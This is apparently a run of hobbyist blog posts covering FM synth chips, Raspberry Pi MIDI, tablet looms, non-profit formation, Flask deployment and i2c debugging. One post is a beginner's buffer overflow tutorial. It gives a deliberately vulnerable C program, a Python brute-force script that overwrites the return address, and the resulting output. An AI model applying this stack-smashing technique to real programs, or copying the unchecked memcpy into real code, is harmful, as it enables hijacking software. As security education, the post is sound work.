Adventures with FM sound and the YM2612

So I’ve been getting a into FM synthesis lately, and after giving the TX7 a spin I’ve been really wanting to try evolving sounds for the later synth chips Yamaha made for games consoles and soundcards. At that point in history FM was one of the only realistic ways you could synthesise complex sound as there wasn’t enough time (processing) for general purpose DSP, and there wasn’t enough space (memory) for sample playback to be an option.

img_3528

One of the most famous of these range of synth chips was the YM2612 which was used in the Sega Megadrive/Genesis consoles. I got hold of a few to try, but it’s been quite a challenge to get them working so I thought probably worth documenting the process. The YM2612 is programmed using 5 control pins and 8 data pins. You send one byte to the chip at a time – first an address to write to, then the data to write, which allows you to set a couple of hundred parameters that define 6 separate sounds. The memory on the chip is organised into a map of the global settings (top left) and the voice settings in two banks:

registers

There isn’t much documentation for these things, the main reference is for a similar chip which is written in Japanese. More usefully there are software versions in emulators, and quite a few bits and pieces online from other people’s projects and some translations of the docs. Usefully the Sega documentation included a piano test sound which is great as you have something that *should* actually make a noise as long as everything else is working.

The first problem was figuring out the timing – despite having some examples it took me a while to realise that there is a specific order that you have to set the status pins, and that there is one change at one time that actually triggers (latches) the data transfer to the synth:

timing

This is a timing diagram, I’m used to seeing them in datasheets, but it’s the first time I’ve needed to understand one properly (with a bit of help from David Viens). It tells us that for writing, the data (D0-D7 pins) are actually read shortly after the WR pin is set low – to add to the fun, some of the pins (denoted by the line over them) are 0v for on, 5v for off. You can also read data from the synth, but whatever address you supply you only get a single status byte that tells you if it’s currently busy, and if either of it’s two internal clocks have overflowed. The idea I assume is that you would use them for timing music accurately without the need to do it in your main CPU.

The audio coming out needs to be amplified too – if you connect it directly to a speaker there is a danger of overloading the DAC and causing it to burn out, so you need a bit of analogue circuitry to do this. Here is an example of triggering and glitching (by writing to random addresses) the example piano sound:

I started off using an Arduino Nano, but didn’t have much success so switched to atmega328 which was a bit easier to set up. One of the problems is that ideally you need to be able to control the 8 data GPIO pins in one go (to set the 8bit value), which isn’t possible from the nano as none of the ports have 8 bits. You also have to supply the YM2612 with a clock pulse at around 8Mhz – which took me a while to get right, I tried both dividing the atmega’s 16Mhz clock by 2 and outputting it on a pin as well as a separate external oscillator and both eventually worked – except the oscillator leaked quite badly into the audio output (there is probably a fairly simple fix to isolate this).

One potential problem is dodgy vintage chips, I tried two suppliers on eBay, one Chinese shop and another in the UK – all the ones I’ve tested so far worked fine, I’m happy to say. The best way of testing them is to use a second hand Sega Megadrive console and replacing the YM2612 it has with a socket you can easily plug in candidates for testing – I managed without but it would have come in handy sanity wise to know for sure that the chips worked.

yamaha_ym2612_top_metal_die_shot
(image source)

One thing that I wasted a lot of time doing was ignoring the output entirely and just trying to get the status bit to change by setting the internal timer – the idea was to make sure the chip logic was working before worrying about the audio amplifier circuitry. However, this requires the read sequence timing to work as well as the write timing – and as soon as you can listen to the output you get small clues from the DAC noise, which actually indicates the chip is running or not even if there is no sound triggered.

ops

Here are some links I found helpful: the wikipedia entry for the pinout, full software documentation (for the registers) and a great blog post about putting it all together, with schematics – in French. Here is a hardware synth module with similar YMF262 chips.

My source (and soon more stuff) is here.

Debugging midi bytes with sonification

I’m currently working on some hardware for interfacing a Raspberry Pi 3 with MIDI. You can of course use a normal USB audio interface, and there is a ready made MIDI Hat module for the Pi already – but I only need MIDI out, and it shouldn’t be a problem to come up with something simple using the GPIO pins.


(Debugging: Wrong clock rate – but we have data! I ended up debugging by sonifying the MIDI bytes with a piezo speaker)

I followed the instructions here, expanded here and updated for Raspberry Pi 3 here – and using bits of all of them I managed to get it working in the end, so I thought it would be a good idea to document it here.

The main idea is that the Raspberry Pi already contains a serial interface we can reconfigure to send MIDI bytes, rather than bolting on lots of new hardware. All you need is to free it up from its default purpose which is to allow external terminal connection and as the bluetooth interface on the Pi3. We also need to slow it right down to 1980’s MIDI baud rate. You can then connect your MIDI cable to the Raspberry Pi’s ‘TX’ pin with a little bit of buffering hardware in between. This is needed to bring it up to 5V from the Pi’s 3.3V logic output (but as they need to be Schmitt triggers perhaps an additional function is to ‘hold’ the voltage for longer). I tried a normal TTL buffer and it didn’t work – but didn’t look into this too closely. As an aside, I found a UK made IC in my stockpile:

ukchip

On the Raspbian end of the equation we need a few tweaks to set up the Raspberry Pi. Edit /boot/cmdline.txt and remove the part that says console=serial0,115200, this stops the kernel listening to the serial device. Next edit /boot/config.txt to add these lines to the bottom:

dtoverlay=pi3-miniuart-bt # disable bluetooth
init_uart_clock=39062500
init_uart_baud=38400
dtparam=uart0_clkrate=48000000

This slows the serial (UART) clock down to the right rate relative to the Pi3 clock and disables bluetooth. Due to the OS switch to systemd on Linux a lot of the documentation is out of date, but I also ran:

sudo systemctl disable serial-getty@ttyAMA0.service

In order to turn off, and stop the console serial interface from starting at boot, I’m not sure if that was required. Then it’s a case of rebooting, compiling ttymidi (which required a small Makefile change to add -lpthread to the link line). This program sets up a MIDI device accessible by ALSA, so we can then install vkeyb (a virtual midi keyboard) and connect it to ttymidi in qjackcontrol. This is a pic of the testing setup with my trusty SU10 sampler.

miditest

My first buffer overflow exploit

I know worryingly little about the world of computer security – I’ve probably written a huge amount of exploitable code in my time, so it’s a good idea as a programmer to spend a bit of effort finding out more about how our programs can be compromised in order to gain awareness of the issues.

The key to understanding exploits is the concept of the universal machine – the fact that trying to restrict what a computer can do is literally fighting against the laws of physics. Lots of money can be poured into software which sometimes only takes a couple of days to get compromised, its a Sisyphean task where the goal can only be to make it “hard enough” – as its likely that anything complex enough to be useful is vulnerable in some way.

Having said that, the classic exploit is quite avoidable but regrettably common – the buffer overflow, a specific kind of common bug which makes it possible to write over a program’s stack to take control of it’s behaviour externally. This was about as much as I knew, but I didn’t really understand the practicalities so I thought I’d write an example to play with. There are quite a lot of examples online, but a lot of them are a little confusing so I’d thought I try a simpler approach.

Here is a function called “unlock_door”, we’ll compile this into a C program and try to force it to execute even though it’s not called from the program:

void unlock_door() { 
  printf("DOOR UNLOCKED\n"); 
  exit(1); 
}

Now we need a vulnerability, this could be something completely unrelated to “unlock_door” but called in the same program – or it’s library code:

void vulnerable(char *incoming_data, unsigned int len) {
    char fixed_buffer[10];
    // woop! put some variable length data in 
    // a fixed size container with no checking
    memcpy(fixed_buffer,incoming_data,len);
    // print out the return pointer, helpful for debugging the hack!
    printf("return pointer is: %p\n", 
        __builtin_return_address(0));
}

The dodgy memcpy call copies incoming_data into fixed_buffer on the stack which is 10 bytes big. If incoming_data is bigger then it will copy outside of the reserved memory and overwrite other data on the stack. One of the other things stored on the stack is the return address value – which tells the program where the function was called from so it can go back when it’s finished. If we can set incoming_data from outside the program, then we can exploit it to redirect program flow and jump into unlock_door instead of returning properly.

We’ll make getting data into the program very simple indeed, and input it via a base16 encoded argument string converted to binary data passed to our vulnerable function in main:

unsigned int base16_decode(const char *hex, char **data) {
  unsigned int str_size = strlen(hex);
  *data = malloc(str_size/2); 
  for (unsigned int i=0; i<str_size; i+=2) {
    if (sscanf(&(hex[i]), "%2hhx", &((*data)[i/2])) != 1) {
      return 0;
    }
  }
  return str_size/2;
}

void main(int argc, char **argv) {
  char *data;
  unsigned int size = base16_decode(argv[1],&data);
  vulnerable(data,size);
  free(data);
  printf("normal exit, door is locked\n");
  exit(0);
}

This is our vulnerable C program finished. If we run it with just a few bytes of data it operates normally and prints out the current return pointer, sending it back into the main function it was called from:

$ ./dodgy_door_prog 0000000000
return pointer is: 0x40088c
normal exit, door is locked

We can now inspect it in order to figure out the exploit. The first thing we can do is run the standard bintools “nm” command on the binary which prints out the addresses of all the functions in the executable. We can search this with grep to print the address of the target function we want to call:

$ nm dodgy_door_prog | grep unlock_door
00000000004007fa T unlock_door

The smart thing to do next is to work out where the return pointer would be relative to the fixed_buffer variable and offset this address to provide a payload to send the the program – I’m not smart though, so I wrote a python program to figure it out for me:

import os
import string

# this is stored in memory in reverse (little endian format)
unlock_door_addr = "fa0740"

def build_payload(length):
    return "00"*length+unlock_door_addr

ret = 0
count = 0
# try increasing offsets and until we get the exit code from unlock_door
# ignore all segfaults and bus errors etc and keep retrying
while ret in [0,35584,34560,34304,33792]:
    payload=build_payload(count)
    cmd="./dodgy_door_prog "+payload
    ret = os.system(cmd);
    print cmd
    count+=1

It took me a while to figure out that addresses are stored in memory backwards to what you’d expect as it’s little-endian memory layout (on intel and everything else these days). The script keeps adding zeros in order to offset the target address until it sits in the right bit of stack memory (you can see the return pointer gradually getting corrupted) and eventually triggers the function:

...
./dodgy_door_prog 00000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Segmentation fault (core dumped)
./dodgy_door_prog 0000000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Bus error (core dumped)
./dodgy_door_prog 000000000000000000000000000000000000000000fa0740
return pointer is: 0x40088c
Bus error (core dumped)
./dodgy_door_prog 00000000000000000000000000000000000000000000fa0740
return pointer is: 0x400840
Segmentation fault (core dumped)
./dodgy_door_prog 0000000000000000000000000000000000000000000000fa0740
return pointer is: 0x404007
Segmentation fault (core dumped)
./dodgy_door_prog 000000000000000000000000000000000000000000000000fa0740
return pointer is: 0x4007fa
DOOR UNLOCKED!

The successful offset is 24 bytes. Now the good news is that this is only possible on GCC if we compile with “-fno-stack-protector”, as by default for the last year or so it checks functions that allocate arrays on the stack by using a random “canary” value pushed to the stack, if the canary gets altered it stops the program before the function returns. However not all functions are checked this way as it’s slow, so it’s quite easy to circumvent for example if changed from an array to to the address of a local variable instead.

More advanced versions of this exploit also insert executable code into the stack to do things like start a shell process so you can run any commands as the program. There is also an interesting technique called “Return Oriented Programming” where you can analyse an executable to find snippets of code that end in returns (called “gadgets”) and string them together to run your own arbitrary programs. This reminds me of the recent work we’ve been doing on biological viruses, as it’s analogous to how they latch onto sections of bacterial DNA to run their own code.

Foam Kernow crypto ‘tea party’

Last night we ran an experimental cryptoparty at Foam Kernow. We’d not tried something like this before, or have any particular expertise with cryptography – so this was run as a research gathering for interested people to find out more about it.

One of the misconceptions about cryptography I wanted to start with is that it’s just about hiding things. We looked at Applied Cryptography by Bruce Schneier where he starts with explaining the 3 things that cryptography provide beyond confidentiality:

Authentication. It should be possible for the receiver of a message to ascertain it’s origin; an intruder should not be able to masquerade as someone else.
Integrity. It should be possible for the receiver of a message to verify that it has not been modified in transit; an intruder should not be able to substitute a false message for a legitimate one.
Nonrepudiation. A sender should not be able to falsely deny later that they sent the message.

It’s interesting how confidentiality is tied up with these concepts – you can’t compromise one without damaging the others. Also how these are a requirement for human communication, but we’ve become so used to living without them.

One of the most interesting things was to hear the motivations for people to come along and find out more about this subject. There were general feeling of loss of control over online identity and data. Some of the more specific aspects:

  • Ambient data collection, our identity increasingly becoming a commodity – being modeled for purposes we do not have control over.
  • Centralisation of communication being a problem – e.g. gmail.
  • Never knowing when your privacy might become important eg. you find yourself in an abusive relationship, suddenly it matters.
  • Knowing that privacy is something we should be thinking about but not wanting to. Similar to knowing we shouldn’t be using the car but doing it anyway.
  • Awareness that our actions don’t just affect us, but our families, friends and colleagues privacy – needing to think about them too.
  • Worrying when googling about health, financial or legal subjects.
  • Being aware that email is monitored in the workplace.

We talked about the encryption we already use – gpg for email with thunderbird and Tor for browsing anonymously. One of the tricky areas we talked about was setting this kind of thing up for mobile – do you need specific apps, an entire OS or specific hardware? This is something we need to spend a bit more time looking into.

Personally speaking, on my phone I use a free firewall so I can at least control which apps on my phone can be online – and I only became aware of this from developing for android and seeing the amount of ‘calling home’ that completely arbitrary applications do regularly.

We also discussed asymmetric key pair crytography – how the mathematics meshes so neatly with social conventions, so you can sign a message to prove you wrote it, or sign someone else’s public key to build up a ‘web of trust’.

We didn’t get very practical, this was more about discussing the issues and feelings on the topic. That might be something to think about for future cryptoparties.

Tanglebots workshop preparation

It’s workshop time again at Foam Kernow. We’re running a Sonic Kayak development open hacklab with Kaffe Matthews (more on this soon) and a series of tanglebots workshops which will be the finale to the weavingcodes project.

Instead of using my cobbled together homemade interface board, we’re using the pimoroni explorer hat (pro). This comes with some nice features, especially a built in breadboard but also 8 touch buttons, 4 LEDs and two motor drivers. The only downside is that it uses the same power source as the Pi for the motors, so you need to be a little careful as it can reset the Pi if the power draw is too great.

2hat

We have a good stock of recycled e-waste robotic toys we’re going to be using to build with (along with some secondhand lego mindstorms):

toys

Also lots of recycled building material from the amazing Cornwall Scrap Store.

material

In order to keep the workshop balanced between programming and building, and fun for all age groups, we want to use Scratch – rather than getting bogged down with python or similar. In a big improvement to previous versions of the Pi OS, the recent raspbian version (jessie) supports lots of extension hardware including the explorer hat. Things like firing the built in LEDs work ‘out of the box’ like this:

2scratch-led

While the two motor controllers (with speed control!) work like this:

2scratch-motor

The touch buttons were a bit harder to get working as they are not supported by default, so I had to write a scratch driver to do this which you can find here. Once the driver script is running (which launches automatically from the desktop icon), it communicates to scratch over the network and registers the 8 touch buttons as sensors. This means they can be accessed in scratch like so:

2scratch-touch

How to warp a tablet loom (/neolithic digital computing device)

Tablet looms have some interesting properties. Firstly, they are very
very old – our neolithic ancestors invented them. Secondly they
are quite straightforward to make and weave but form an extremely
complex structure that incorporates both weaving and braiding (and one I
haven’t managed to simulate correctly yet) – they are also the only form
of weaving that has never been mechanised.

I’ve learned to warp tablets very much by trial and error, so I expect
there are many improvements possible (please let me know), but as I had
to warp a load of tablet looms for the weavecoding workshop in Düsseldorf last
week, I thought I’d document the process here.

The first thing you need to do is make the tablets themselves from
fairly stiff card. You need squares of about 5cm, and holes punched out
from the corners. Beer mats or playing cards are good, I’m just using recycled card here. It saves a bit of time later if you can get the holes lined up when
the tablets are stacked together – but I’ve never managed to do this
very well. A good number of cards to start with are 8 or 10, fewer in
number are easier to manipulate and use less yarn – if you don’t have
much to spare.

IMG_20160122_120729

The second step is to prepare the warp yarn. You need four separate
balls or cones of wool – it’s easiest to start with four different
colours, although you can make more patterns with double faced weave
(two colours opposite each other on the cards). Fluffy knitting wool
works fine but can catch and be annoying sometimes, cotton is better. In
order to help prevent the yarn getting tangled together which is
probably the biggest problem with this job – it’s a good idea to set
this up so the yarn passes through the back of a chair with the yarn on
the floor like this – it restricts the distance the balls roll as you
pull the yarn.

IMG_20160122_120905

You need two sticks you can easily loop the warp over, I’m using a cut
broom stick clamped to the chair here. The distance between them determines
how long the final woven band will be, a metre or so is good.

Next you need to thread each of the four warp threads through the
corners of the tablets – each thread needs it’s own corner so be careful
not to mix them up. If the holes line up you can do them all at once,
otherwise it’s one by one.

IMG_20160122_121329

Here are the tablets with all the corners threaded.

IMG_20160122_122040

Now we tie the threads together looped over the warp stick furthest from
the yarn, this knot is temporary.

IMG_20160122_122324

Hook the other end of the warp over the stick on the other side, and
leave one of the tablets half way along. Loop it back again leaving
another tablet – go backwards and forwards repeating.

IMG_20160122_122645

I can never manage to keep the tablets in order, and usually end up with a mess like this – don’t panic if you get a similar result!

IMG_20160122_123113

When you have done all of the tablets, quickly check that every warp
pass has a card associated with it and then cut the first knot and tie
the last warp threads to the first.

IMG_20160122_123216

This gives you a continuous warp, which is good for adjusting the
tension. Group all the cards together and arrange them so the colours
are aligned – rotate them until the same colours are at the top and the bottom.

IMG_20160122_123849

This is also a good point to check the twist of the tablets so they alternate in
terms of the direction the threads are coming from. This is quite
difficult to explain with text but these images may help. It’s basically a bit easier if they are consistent when you start weaving, then you can see how changing this alters the patterns as you go.

IMG_20160122_123910

IMG_20160122_123927

You can actually reorder and flip the tablets at any time, even after
starting weaving – so none of this is critical. It’s handy to equalise
the tension between the warp threads at this point though, so grab all
the cards in alignment, put some tension on the warp and drag them up
and down the warp – if the loops at either end are not too close this
should get the lengths about the same.

Once this is done, tie all the tablets together to preserve their order
and alignment.

IMG_20160122_124223

Then tie loops of strong cord around both ends of the warp.

IMG_20160122_124426

Then you’re done – you can pull the ends off the sticks and start tablet
weaving!

IMG_20160122_124528

As I needed to transport the tablet looms I wrapped the warps (keeping the upper/lower threads separated) around cardboard tubes to keep the setup from getting tangled up. This seemed to work well:

IMG_20160122_130602

If you find one of the warp threads is too long and is causing
a tablet to droop when the warp is under tension, you can pull it tight
and tie it back temporarily, after weaving a few wefts it will hold in
place.

The two most important things I’ve learned about weaving – the older the
technique the more forgiving it is to mistakes, and you can never have
too many sticks.

Organisation hacking (part 2)

Time for the next installment in my attempt to document the sometimes opaque world of setting up a company, based on experiences founding Foam Kernow. As before ‘I Am Not A Lawyer’, as they say – so no substitute for proper legal advice here, and any corrections would be most welcome. See part 1 about the motivations for non-profit vs shareholder companies.

Company formation

Companies in the UK are founded with two documents, the ‘articles of association’ and a ‘memorandum of association’.

The articles of association broadly has two purposes. One is to state why the company has been brought into existence. The other is to strictly define the decision making process for those involved. You don’t generally need to write these documents from scratch, as we are provided with ‘model articles’ from which we can base new companies easily.

The company’s objects

A non-profit needs to describe it’s purpose via ‘objects’. This is important because, as explained in part one, a non-profit is strictly controlled in terms of access to its money. The objects describe what the company assets (e.g. cash) can legitimately be used for. You can’t found a non-profit for running e.g. a school and use it later for selling cars.

In contrast the objects for a company with shareholders is to provide a return on the investment for those shareholders, no more and no less. As such, for-profits do not need to provide any objects.

Articles of association are on the public record (you can pay Companies House £1 to send them to you). Naturally I’ve uploaded Foam Kernow’s articles on github :) These are based on the UK’s model articles – the main addition are the objects, which are a distilled version from Foam Brussels’ charter:

The objects for which the Company is established are to:

1.11 promote art, science and education by identifying and strengthening the areas that connect them;

1.12 embrace cultural change;

1.13 foster interdependence;

1.14 cultivate the beginner’s mind;

1.15 respecting and sharing sources;

1.16 empower participants to translate an idea into practice;

1.17 foster open source culture; and

1.18 embrace creative conflict.

So in a nutshell, the objects provide a publicly stated purpose and philosophy, such as this, for everybody involved.

Object 1.11 (the numbering scheme irks me as a programmer) was added in order to underscore the arts/sciences purpose of foam. This meant we could apply for an exemption to drop ‘limited’ from the end of the name, in order to highlight our independent research focus.

Memorandum of Association

The memorandum is an agreement between the individuals founding the organisation – the share of capital (in a for-profit) or the share of liability (in a non-profit), the names and addresses – and eye colour, interestingly of all involved.

Democracy

The standard corporate structure in a company limited by guarantee is a democratic one consisting of two levels. ‘Directors’ of a company take day to day decisions and responsibility while ‘Members’ of the company have voting powers on important decisions and have the ability to remove or add new directors. This structure is very flexible, neither directors nor members need to be employed by the company, and alternatively it’s also possible for a company to only have a single director/member who is also employed on the payroll. This is how foam kernow started, and bizarrely I had to supply minutes to Companies House for a meeting with myself to appoint a new director.

There is quite a lot of confusing terminology around all this, for example an ‘executive’ director is one that is employed by the company (also known as a CEO) while a ‘non-executive’ is one that is otherwise external to the company.

As an aside, some companies are wholly owned by their employees, where all people on the payroll are made members and given votes automatically – however this is not the norm.

Organisation hacking (part 1)

Over the last six months I’ve been taking a crash course in company formation, treating it like any other investigation into a strange and esoteric technology. Last year I registered FoAM Kernow as a UK non profit organisation in the mould of FoAM Brussels. Starting off with absolutely no knowledge at all (but with a lot of help from FoAM’s wider friends and relations) I found a lot of confusing fragments of information online so I thought I’d document the process here as much as I can. It’s important to state that I’m not a lawyer or professional in these matters at all, so no substitute for proper legal advice – and any corrections would be most welcome.

What does non-profit mean?

A non-profit company is simply one that is not allowed to have shareholders. A for-profit company can pay a set of people who own shares part of the profits called dividends. In a non-profit the money outflow is more tightly controlled and can only go to employees or to pay costs for the company. Contrary to popular belief, there is no limitation on the size of the company, how much it pays employees or the money it makes in total (there are some very large non-profits out there).

In place of shareholders, a non-profit is “limited by guarantee” – a more legally correct term for this type of organisation. Individuals guarantee a set amount against liability (debts). The default is a whopping £1 each.

As far as I understand it “limited by shares” and “limited by guarantee” are the two main different types of organisation in the UK. There are also a cluster of other subcategories: charities, community interest groups, co-operatives and social enterprises for example. These are a little bit more fuzzy it seems, but they tend to be different flavours of limited by guarantee companies with more legal paperwork (especially in the case of charities) to determine the precise purpose and role of the organisation, and ultimately access to profits – what the money can and can’t be used for.

Why form a company?

Having a legal entity with which to work from rather than being an individual (sole trader) is better for larger projects, and bigger institutions are happier collaborating with legal entities. This is partly a matter of indirection or abstraction, e.g. if I get hit by the proverbial bus, the legal entity continues to exist. More importantly, it means multiple people can work together as part of a legal structure with a publicly stated set of shared values (called the articles of association). There is also a well established democratic process to make organisational decisions (more on that later).

Sole traders on the other hand can employ as many people as they want, but the structure would be fixed as a simple hierarchy – and the organisation has no legally defined purpose. Also things like insurance are different, but I won’t get into that yet!

Why form a non profit company?

A non-profit fits well with the goals of FoAM. Generally we focus on exploring ways of doing independent research, we are strict on non-exclusive rights to our work (participating in free software and creative commons) and finding a place between arts and sciences. None of this requires conventional fund raising by selling shares.

Another big reason is an issue of trust. We work mainly with people in spheres of arts and research – and it turns out a lot of people don’t want to work with companies that are run on a for-profit basis. In fact I would go so far as to say that some of the most interesting people we work with are wary of this. There is a somewhat justifiable worry that their contribution may be exploited via pressures to make a return on investments made by third parties.

The downsides are mainly tax related – for-profit companies can use dividends to pay investors (who can be employees too) which are not taxed – this is a very common practice. Usually small companies employ people at the minimum taxable wage then pay the rest by dividends. There is no way to do this with a company limited by guarantee – all payments to people need to be accounted for as normal employment or subcontracting and subject to income tax. It turns out that there are other upsides to being non-profit that may counteract this in the long run as you get treated differently in some contexts (e.g banking). For the next installment (if I find time!) I’d like to talk more about that and the formation process too…

Connecting Flask to Apache

When exploring the cosmos of python powered web frameworks it’s easy to get lost due to fast moving versions. Recently we had a lot of difficulty getting Flask connected via a WSGI script on Apache. This seems to be due to needing the object factory to be called specifically rather than relying on the module namespace to do the work for us, there doesn’t seem to be much help online about this yet. We’re also running python in a virtualenv so the working wsgi script looks like this:

#!/usr/bin/python                                                               
import sys
import logging
import os

logging.basicConfig(stream=sys.stderr)
PROJECT_DIR = "/var/www/yourflasksite/"
activate_this = os.path.join(PROJECT_DIR, 'bin', 'activate_this.py')
execfile(activate_this, dict(__file__=activate_this))

sys.path.append(PROJECT_DIR)
from app import create_app
application=create_app(os.getenv('FLASK_CONFIG') or 'default')
application.secret_key = 'your site's key'

For completeness, here is the apache config that starts it up:

<VirtualHost *:80>
    ServerName your.url
    WSGIScriptAlias / /var/www/yourflasksite/yoursite.wsgi
    <Directory /var/www/yourflasksite/app>
	Order allow,deny
        Allow from all
    </Directory>
    Alias /static /var/www/yourflasksite/app/static
    <Directory /var/www/yourflasksite/app/static/>
        Order allow,deny
        Allow from all
    </Directory>
    ErrorLog ${APACHE_LOG_DIR}/yourflasksite-error.log
    LogLevel warn
    CustomLog ${APACHE_LOG_DIR}/yourflasksite-access.log 
</VirtualHost>

Adventures with i2c

In order to design the next version of the flotsam hardware I need to make it cheaper and easier to build. The existing hardware was very cheap in terms of components but expensive in terms of time it took to construct! With this lesson learned and with a commission on the horizon I need to find a simpler and more flexible approach to communication between custom hardware and the Raspberry Pi – mainly one that doesn’t require so many wires.

i2c is a serial communication standard used by all kinds of components from sensors to LCD displays. The Raspberry Pi comes with it built in, as the Linux kernel supports it along with various tools for debugging. I also have some Atmel processors from a previous project and there is quite a bit of example code for them. I thought I would post a little account of my troubleshooting on this for others that follow the same path, as I feel there is a lot of undocumented knowledge surrounding these slightly esoteric electronics.

The basic idea of i2c is that you can pass data between a large number of independent components using only two wires to connect them all. One is for data, the other is for a clock signal used for synchronisation.

Debugging LEDs
Debugging LEDs

I started off with the attiny85 processor, mainly as it was the first one I found, along with this very nice and clear library. I immediately ran into a couple of problems, one was that while it has support for serial communication built in (USI) you have to implement i2c on top of this so your code needs to do a lot more. The second was with only 8 pins the attiny85 is not great for debugging. I enabled i2c on the Raspberry Pi and hooked it up, ran i2cdetect – no joy. After a lot of fiddling around with pull up resistors and changing voltages between 3 and 5v either no devices were detected, or all of them were, all reads returning 0 (presumably logic pulled high for everything) or noise – nothing seemed to make any difference.

After a while (and trying other i2c slave libraries to no avail) I switched to an atmega328 processor using this library which includes a Makefile! One thing that I’ve noticed that would make things much easier for learning this stuff is more complete toolchains in example code including the right #defines and fuse settings for the processor. However this code didn’t work either at first, and my attempts at using debugging LEDs on PORTB didn’t work until I figured out it was conflicting with the UART i/o used in the example code – after figuring out that this wasn’t part of the i2c code I removed it and the Raspberry Pi could at last see the device with i2cdetect. With the addition of some LEDS I could check that bytes being sent were correctly being written to the internal buffer at the correct addresses.

It finally works!
It finally works!

Reading was another matter however. Most of the time i2cget on the Pi failed, and when it did work it only returned 0x65 no matter what the parameters. I’d already read extensively about the Raspberry Pi’s i2c clock stretching bug and applied various fixes which didn’t seem to make any difference. What did the trick was to remove the clock divide on the atmega’s fuses – by default it runs at 8Mhz but slows the instruction cycles to 1Mhz – without that it could keep up with the Pi’s implementation and all reads were successful. I still had to solve the ‘0x65 problem’, and went into the i2c code to try and figure out what was going on (using 8 LEDs to display the i2c status register). It seems like reading single bytes one at a time is done by issuing a TW_ST_DATA_NACK as opposed to TW_ST_DATA_ACK, as it sends a not-acknowledged for the last byte read. This state is not supported by the library, after fiddling around with it a bit I switched over on the Pi’s side to using the python smbus library, and tried using read_i2c_block_data – which reads 32 bytes at a time. The first byte is still 0x65 (101 in decimal, in the photo above) – but the rest are correct, I’ll need to read a bit more on the i2c protocol to figure that one out (and get the attiny working eventually), but at least it’s enough for what I need now.

Handy collection of pinouts
Handy collection of pinouts